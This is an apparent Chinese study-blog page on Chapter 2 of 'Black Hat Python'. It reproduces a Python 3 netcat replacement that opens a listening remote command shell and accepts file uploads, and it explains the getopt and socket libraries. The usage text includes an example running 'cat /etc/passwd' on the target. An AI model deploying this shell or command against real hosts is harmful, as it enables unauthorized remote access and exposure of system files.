



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="1asy" href="https://self-ferry.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="1asy" href="https://self-ferry.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="1asy" href="https://self-ferry.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="python" />


<link rel="canonical" href="https://self-ferry.github.io/2020/12/01/BHP%E7%AC%AC%E4%BA%8C%E7%AB%A0(%E4%B8%80)%E2%80%94%E2%80%94%E5%8F%96%E4%BB%A3NetCat/">



  <title>
BHP第二章(一)——取代NetCat - BHP |
Yume Shoka = 1asy = 悟已往之不谏 知来者之可追 实迷途其未远 觉今是而昨非</title>
<meta name="generator" content="Hexo 5.2.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">BHP第二章(一)——取代NetCat
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2020-12-01 22:22:41">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2020-12-01T22:22:41+08:00">2020-12-01</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Yume Shoka</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1giph4baakhj20zk0m8h5q.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gipexw3o58j20zk0m8e81.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gicitcxhpij20zk0m8hdt.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1giclfdu6exj20zk0m87hw.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gipewr8iypj20zk0m8b29.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gicm07ih54j20zk0m84qp.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/BHP/" itemprop="item" rel="index" title="分类于 BHP"><span itemprop="name">BHP</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://self-ferry.github.io/2020/12/01/BHP%E7%AC%AC%E4%BA%8C%E7%AB%A0(%E4%B8%80)%E2%80%94%E2%80%94%E5%8F%96%E4%BB%A3NetCat/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="1asy">
    <meta itemprop="description" content="悟已往之不谏 知来者之可追 实迷途其未远 觉今是而昨非, ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="1asy">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p><img data-src="/images/bimg/%E9%98%BF%E5%B0%94%E5%8D%91%E6%96%AF%E5%B1%B1%E8%84%89%E4%B8%8B%E7%9A%84%E8%80%81%E5%9F%8E.jpg"></p>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><blockquote>
<p>Python学了一年了，仍然有那种不能如臂使指的感觉。想进一步提升自己的编程能力。就去看了Justin Seitz的《Python黑帽子》，书很不错，开阔了眼界，对Python又有了新的认识，准备深研读这本书。</p>
</blockquote>
<h1 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h1><p>本来想自己改进一下书上写的代码，网上冲浪时发现已经有人早就写了。附上<span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwNTQ5MDcwL2FydGljbGUvZGV0YWlscy8xMDgxOTM1Mzc=">https://blog.csdn.net/qq_40549070/article/details/108193537</span></p>
<h1 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h1><pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> sys
<span class="token keyword">import</span> getopt
<span class="token keyword">import</span> threading
<span class="token keyword">import</span> chardet
<span class="token keyword">import</span> subprocess
<span class="token keyword">import</span> socket

<span class="token comment"># 定义一些全局变量</span>
listen <span class="token operator">=</span> <span class="token boolean">False</span>
command <span class="token operator">=</span> <span class="token boolean">False</span>
execute <span class="token operator">=</span> <span class="token string">""</span>
upload_destination <span class="token operator">=</span> <span class="token string">""</span>
target <span class="token operator">=</span> <span class="token string">""</span>
port <span class="token operator">=</span> <span class="token number">0</span>


<span class="token keyword">def</span> <span class="token function">usage</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"BHP Net Tool"</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Usage: bhpnet.py -t target_host -p port"</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"-l --listen    -listen on [host]:[port] for incoming connections"</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"-e --execute=file_to_run    -execute the given file upon receiving a connection"</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"-c --command    -initialize a command shell"</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"-u --upload=destination    -upon receiving connection upload a file and write to [destination]"</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Examples:"</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"bhpnet.py -t 192.168.0.1 -p 5555 -l -c"</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"</span><span class="token punctuation">)</span>
    sys<span class="token punctuation">.</span>exit<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>

    <span class="token keyword">global</span> listen<span class="token punctuation">,</span> command<span class="token punctuation">,</span> execute<span class="token punctuation">,</span> upload_destination<span class="token punctuation">,</span> target<span class="token punctuation">,</span> port

    <span class="token keyword">if</span> <span class="token keyword">not</span> <span class="token builtin">len</span><span class="token punctuation">(</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        usage<span class="token punctuation">(</span><span class="token punctuation">)</span>
	<span class="token comment"># 读取命令行选项</span>
    <span class="token keyword">try</span><span class="token punctuation">:</span>
        opts<span class="token punctuation">,</span> args <span class="token operator">=</span> getopt<span class="token punctuation">.</span>getopt<span class="token punctuation">(</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token string">"hle:t:p:cu:"</span><span class="token punctuation">,</span> <span class="token punctuation">[</span><span class="token string">"help"</span><span class="token punctuation">,</span> <span class="token string">"listen"</span><span class="token punctuation">,</span> <span class="token string">"execute="</span><span class="token punctuation">,</span> <span class="token string">"target="</span><span class="token punctuation">,</span> <span class="token string">"port="</span><span class="token punctuation">,</span> <span class="token string">"command"</span><span class="token punctuation">,</span> <span class="token string">"upload="</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
    <span class="token keyword">except</span> getopt<span class="token punctuation">.</span>GetoptError <span class="token keyword">as</span> err<span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>err<span class="token punctuation">)</span><span class="token punctuation">)</span>
        usage<span class="token punctuation">(</span><span class="token punctuation">)</span>

    <span class="token keyword">for</span> o<span class="token punctuation">,</span> a <span class="token keyword">in</span> opts<span class="token punctuation">:</span>
        <span class="token keyword">if</span> o <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token string">'-h'</span><span class="token punctuation">,</span> <span class="token string">"--help"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            usage<span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token keyword">elif</span> o <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token string">"-l"</span><span class="token punctuation">,</span> <span class="token string">"--listen"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            listen <span class="token operator">=</span> <span class="token boolean">True</span>
        <span class="token keyword">elif</span> o <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token string">"-e"</span><span class="token punctuation">,</span> <span class="token string">"--execute"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            execute <span class="token operator">=</span> a
        <span class="token keyword">elif</span> o <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token string">"-t"</span><span class="token punctuation">,</span> <span class="token string">"--target"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            target <span class="token operator">=</span> a
        <span class="token keyword">elif</span> o <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token string">"-p"</span><span class="token punctuation">,</span> <span class="token string">"--port"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            port <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>a<span class="token punctuation">)</span>
        <span class="token keyword">elif</span> o <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token string">"-c"</span><span class="token punctuation">,</span> <span class="token string">"--command"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            command <span class="token operator">=</span> <span class="token boolean">True</span>
        <span class="token keyword">elif</span> o <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token string">"-u"</span><span class="token punctuation">,</span> <span class="token string">"--upload"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            upload_destination <span class="token operator">=</span> a
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            <span class="token keyword">assert</span> <span class="token boolean">False</span><span class="token punctuation">,</span> <span class="token string">"Unhandled Option"</span>
	<span class="token comment"># 我们是进行监听还是仅从标准输入发送数据？</span>
    <span class="token keyword">if</span> <span class="token keyword">not</span> listen <span class="token keyword">and</span> <span class="token builtin">len</span><span class="token punctuation">(</span>target<span class="token punctuation">)</span> <span class="token keyword">and</span> port <span class="token operator">></span> <span class="token number">0</span><span class="token punctuation">:</span>
    	<span class="token comment"># 从命令行读取内存数据</span>
    	<span class="token comment"># 这里将阻塞，所以不在向标准输入发送数据时发送ctrl-D</span>
        <span class="token builtin">buffer</span> <span class="token operator">=</span> sys<span class="token punctuation">.</span>stdin<span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token comment"># 发送数据</span>
        client_sender<span class="token punctuation">(</span><span class="token builtin">buffer</span><span class="token punctuation">)</span>
	<span class="token comment"># 我们开始监听并准备上传文件、执行命令</span>
	<span class="token comment"># 放置一个反弹shell</span>
	<span class="token comment"># 取决于上面得命令行选项</span>
    <span class="token keyword">if</span> listen<span class="token punctuation">:</span>
        server_loop<span class="token punctuation">(</span><span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">server_loop</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">global</span> target
	<span class="token comment"># 如果没有定义目标，那么我们监听所有接口</span>
    <span class="token keyword">if</span> <span class="token keyword">not</span> <span class="token builtin">len</span><span class="token punctuation">(</span>target<span class="token punctuation">)</span><span class="token punctuation">:</span>
        target <span class="token operator">=</span> <span class="token string">"0.0.0.0"</span>

    server <span class="token operator">=</span> socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span>socket<span class="token punctuation">.</span>AF_INET<span class="token punctuation">,</span> socket<span class="token punctuation">.</span>SOCK_STREAM<span class="token punctuation">)</span>
    server<span class="token punctuation">.</span>bind<span class="token punctuation">(</span><span class="token punctuation">(</span>target<span class="token punctuation">,</span> port<span class="token punctuation">)</span><span class="token punctuation">)</span>
    server<span class="token punctuation">.</span>listen<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span>

    <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
        client_socket<span class="token punctuation">,</span> addr <span class="token operator">=</span> server<span class="token punctuation">.</span>accept<span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token comment"># 分析一个线程处理新的客户端</span>
        client_thread <span class="token operator">=</span> threading<span class="token punctuation">.</span>Thread<span class="token punctuation">(</span>target<span class="token operator">=</span>client_handler<span class="token punctuation">,</span> args<span class="token operator">=</span><span class="token punctuation">(</span>client_socket<span class="token punctuation">,</span> <span class="token punctuation">)</span><span class="token punctuation">)</span>
        client_thread<span class="token punctuation">.</span>start<span class="token punctuation">(</span><span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">client_sender</span><span class="token punctuation">(</span><span class="token builtin">buffer</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
	<span class="token comment"># 连接到目标主机</span>
    client <span class="token operator">=</span> socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span>socket<span class="token punctuation">.</span>AF_INET<span class="token punctuation">,</span> socket<span class="token punctuation">.</span>SOCK_STREAM<span class="token punctuation">)</span>

    <span class="token keyword">try</span><span class="token punctuation">:</span>
        client<span class="token punctuation">.</span>connect<span class="token punctuation">(</span><span class="token punctuation">(</span>target<span class="token punctuation">,</span> port<span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token keyword">if</span> <span class="token builtin">len</span><span class="token punctuation">(</span><span class="token builtin">buffer</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            client<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token builtin">buffer</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
        	<span class="token comment"># 现在等待数据回传</span>
            recv_len <span class="token operator">=</span> <span class="token number">1</span>
            response <span class="token operator">=</span> <span class="token string">""</span>
            <span class="token keyword">while</span> recv_len<span class="token punctuation">:</span>
                data <span class="token operator">=</span> client<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">4096</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span>
                recv_len <span class="token operator">=</span> <span class="token builtin">len</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span>
                response <span class="token operator">+=</span> data
                <span class="token keyword">if</span> recv_len <span class="token operator">&lt;</span> <span class="token number">4096</span><span class="token punctuation">:</span>
                    <span class="token keyword">break</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span>response<span class="token punctuation">)</span>
            <span class="token comment"># 等待更多输入</span>
            <span class="token comment"># 这里python2使用的是raw_input()，在python3中取消了此函数，input()可以起到相同的作用</span>
            <span class="token builtin">buffer</span> <span class="token operator">=</span> <span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">""</span><span class="token punctuation">)</span>
            <span class="token builtin">buffer</span> <span class="token operator">+=</span> <span class="token string">'\n'</span>
            <span class="token comment"># 发送数据</span>
            client<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token builtin">buffer</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">except</span><span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"[*] Exception! Exiting."</span><span class="token punctuation">)</span>
        <span class="token comment"># 关闭连接</span>
        client<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">run_command</span><span class="token punctuation">(</span>command<span class="token punctuation">)</span><span class="token punctuation">:</span>
	<span class="token comment"># 处理多余得空格和换行符</span>
    command <span class="token operator">=</span> command<span class="token punctuation">.</span>rstrip<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token keyword">try</span><span class="token punctuation">:</span>
    	<span class="token comment"># 先解码，再执行命令</span>
        command <span class="token operator">=</span> command<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span>
        <span class="token comment"># 运行命令并将输出返回</span>
        output <span class="token operator">=</span> subprocess<span class="token punctuation">.</span>check_output<span class="token punctuation">(</span>command<span class="token punctuation">,</span> stderr<span class="token operator">=</span>subprocess<span class="token punctuation">.</span>STDOUT<span class="token punctuation">,</span> shell<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span>
        <span class="token comment"># 这里所返回的命令结果都是以系统shell默认编码的形式返回。</span>
    <span class="token keyword">except</span><span class="token punctuation">:</span>
        output <span class="token operator">=</span> <span class="token string">b"Failed to execute command.\r\n"</span>
    <span class="token comment"># 将输出发送</span>
    <span class="token keyword">return</span> output


<span class="token keyword">def</span> <span class="token function">client_handler</span><span class="token punctuation">(</span>client_socket<span class="token punctuation">)</span><span class="token punctuation">:</span>
	<span class="token comment"># 检测上传文件</span>
    <span class="token keyword">if</span> <span class="token builtin">len</span><span class="token punctuation">(</span>upload_destination<span class="token punctuation">)</span><span class="token punctuation">:</span>
    	<span class="token comment"># 读取所有都字符并写下目标</span>
        file_buffer <span class="token operator">=</span> <span class="token string">""</span>
        <span class="token comment"># 持续读取数据直到没有符合得数据</span>
        <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
            data <span class="token operator">=</span> client_socket<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span>
            <span class="token keyword">if</span> <span class="token keyword">not</span> data<span class="token punctuation">:</span>
                <span class="token keyword">break</span>
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                file_buffer <span class="token operator">+=</span> data
        <span class="token comment"># 现在我们接受这些数据并将他们写出来</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            <span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span>upload_destination<span class="token punctuation">,</span> <span class="token string">"wb"</span><span class="token punctuation">)</span> <span class="token keyword">as</span> file_descriptor<span class="token punctuation">:</span>
                file_descriptor<span class="token punctuation">.</span>write<span class="token punctuation">(</span>file_buffer<span class="token punctuation">)</span>
                client_socket<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'Successfully saved file to %s'</span> <span class="token operator">%</span> upload_destination<span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token keyword">except</span><span class="token punctuation">:</span>
            client_socket<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'Failed saved file to %s'</span> <span class="token operator">%</span> upload_destination<span class="token punctuation">)</span><span class="token punctuation">)</span>
	<span class="token comment"># 检查执行命令</span>
    <span class="token keyword">if</span> <span class="token builtin">len</span><span class="token punctuation">(</span>execute<span class="token punctuation">)</span><span class="token punctuation">:</span>
        output <span class="token operator">=</span> run_command<span class="token punctuation">(</span>execute<span class="token punctuation">)</span>
        client_socket<span class="token punctuation">.</span>send<span class="token punctuation">(</span>output<span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
	<span class="token comment"># 如果需要一个命令行shell，那么我们进入另一个循环</span>
    <span class="token keyword">if</span> command<span class="token punctuation">:</span>
        <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
        	<span class="token comment"># 跳出一个窗口</span>
            client_socket<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token string">b'&lt;BHP:#>'</span><span class="token punctuation">)</span>
            cmd_buffer <span class="token operator">=</span> <span class="token string">""</span>
            cmd_buffer <span class="token operator">=</span> <span class="token builtin">str</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span>cmd_buffer<span class="token punctuation">)</span>
            <span class="token comment"># 现在我们接收文件直到发现换行符</span>
            <span class="token keyword">while</span> <span class="token string">'\n'</span> <span class="token keyword">not</span> <span class="token keyword">in</span> cmd_buffer<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
                cmd_buffer <span class="token operator">+=</span> client_socket<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span>
            <span class="token comment"># 返还命令输出</span>
            response <span class="token operator">=</span> run_command<span class="token punctuation">(</span>cmd_buffer<span class="token punctuation">)</span>
            <span class="token comment"># 这里使用detect函数进行判断字节编码，并按照结果进行解码。</span>
            btype <span class="token operator">=</span> chardet<span class="token punctuation">.</span>detect<span class="token punctuation">(</span>response<span class="token punctuation">)</span>
            <span class="token keyword">if</span> btype<span class="token punctuation">[</span><span class="token string">'encoding'</span><span class="token punctuation">]</span> <span class="token operator">==</span> <span class="token string">'GB2312'</span><span class="token punctuation">:</span>
                response <span class="token operator">=</span> response<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'gbk'</span><span class="token punctuation">)</span>
                response <span class="token operator">=</span> <span class="token builtin">str</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span>response<span class="token punctuation">)</span>
            <span class="token comment"># 发送响应数据</span>
            client_socket<span class="token punctuation">.</span>send<span class="token punctuation">(</span>response<span class="token punctuation">)</span>


<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>
    main<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>

<h1 id="前提学习"><a href="#前提学习" class="headerlink" title="前提学习"></a>前提学习</h1><p>没有用过getopt库（可之前学了optparse库，optparse也能实现这个功能），于是就去学getopt库</p>
<h2 id="getopt库学习"><a href="#getopt库学习" class="headerlink" title="getopt库学习"></a>getopt库学习</h2><p>getopt是一个命令行选项解析器。<br>getopt的函数之一：<br>getopt.getopt(args, shortopts, longopts=[])</p>
<ul>
<li><p>args为要解析的参数列表，不包含argv[0]，即：文件名。</p>
</li>
<li><p>shortopts为脚本所要识别的字母选项，如：-h</p>
</li>
<li><p>longopts为一个被支持的长选项名称组成的列表，如：–help</p>
</li>
</ul>
<p>关于shortopts：<br>shortopts是一个字母；<br>它可以写成纯字符：o，也可以写成带一个-的形式：-o。<br>如果某一个选项后面有参数，那么它的后面就会带一个冒号：o:或者-o:。<br>当有好几个短操作参数时，可以直接写到一起：’abcd’或者’-abcd’或者’-ab-c-d’，可随意组合。</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> getopt
parses <span class="token operator">=</span> <span class="token string">"-c -p 3306 -h 192.168.1.1 a1 a2"</span><span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token punctuation">)</span>
optlist<span class="token punctuation">,</span> args <span class="token operator">=</span> getopt<span class="token punctuation">.</span>getopt<span class="token punctuation">(</span>parses<span class="token punctuation">,</span> <span class="token string">'cp:h:'</span><span class="token punctuation">)</span>
输出
<span class="token triple-quoted-string string">'''
>>> optlist
[('-c', ''), ('-p', '3306'), ('-h', '192.168.1.1')]
>>> args
['a1', 'a2']
'''</span></code></pre>

<p>关于longopts:<br>longopts必须写在[]中，且放在一对单引号中：[‘–help’]<br>如果想承接参数，则要在后面加一个=：[‘–help=’]<br>longopts必须用逗号隔开，且每个都在一对单引号中</p>
<pre class="language-python" data-language="python"><code class="language-python">使用长选项名的例子：
<span class="token operator">>></span><span class="token operator">></span> <span class="token keyword">import</span> getopt
<span class="token operator">>></span><span class="token operator">></span> s <span class="token operator">=</span> <span class="token string">'--condition=foo --testing --output-file abc.def -x a1 a2'</span>
<span class="token operator">>></span><span class="token operator">></span> args <span class="token operator">=</span> s<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token operator">>></span><span class="token operator">></span> args
<span class="token punctuation">[</span><span class="token string">'--condition=foo'</span><span class="token punctuation">,</span> <span class="token string">'--testing'</span><span class="token punctuation">,</span> <span class="token string">'--output-file'</span><span class="token punctuation">,</span> <span class="token string">'abc.def'</span><span class="token punctuation">,</span> <span class="token string">'-x'</span><span class="token punctuation">,</span> <span class="token string">'a1'</span><span class="token punctuation">,</span> <span class="token string">'a2'</span><span class="token punctuation">]</span>
<span class="token operator">>></span><span class="token operator">></span> optlist<span class="token punctuation">,</span> args <span class="token operator">=</span> getopt<span class="token punctuation">.</span>getopt<span class="token punctuation">(</span>args<span class="token punctuation">,</span> <span class="token string">'x'</span><span class="token punctuation">,</span> <span class="token punctuation">[</span><span class="token string">'conditions='</span><span class="token punctuation">,</span> <span class="token string">'output-file='</span><span class="token punctuation">,</span> <span class="token string">'testing'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
<span class="token operator">>></span><span class="token operator">></span> optlist
<span class="token punctuation">[</span><span class="token punctuation">(</span><span class="token string">'--conditions'</span><span class="token punctuation">,</span> <span class="token string">'foo'</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token string">'--testing'</span><span class="token punctuation">,</span> <span class="token string">''</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token string">'--output-file'</span><span class="token punctuation">,</span> <span class="token string">'abc.def'</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token string">'-x'</span><span class="token punctuation">,</span> <span class="token string">''</span><span class="token punctuation">)</span><span class="token punctuation">]</span>
<span class="token operator">>></span><span class="token operator">></span> args
<span class="token punctuation">[</span><span class="token string">'a1'</span><span class="token punctuation">,</span> <span class="token string">'a2'</span><span class="token punctuation">]</span></code></pre>

<p>#options存的是短格式和长格式<br>#args存的是除短格式和长格式之外的，也就是存没有-和–的</p>
<h2 id="socket库"><a href="#socket库" class="headerlink" title="socket库"></a>socket库</h2><blockquote>
<p>再复习一下怎么建立TCP通信 </p>
</blockquote>
<h3 id="创建一个TCP-client端的流程"><a href="#创建一个TCP-client端的流程" class="headerlink" title="创建一个TCP client端的流程"></a>创建一个TCP client端的流程</h3><ol>
<li>创建套接字 <ul>
<li>client_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) 协议号可以省略</li>
</ul>
</li>
<li>建立连接   <ul>
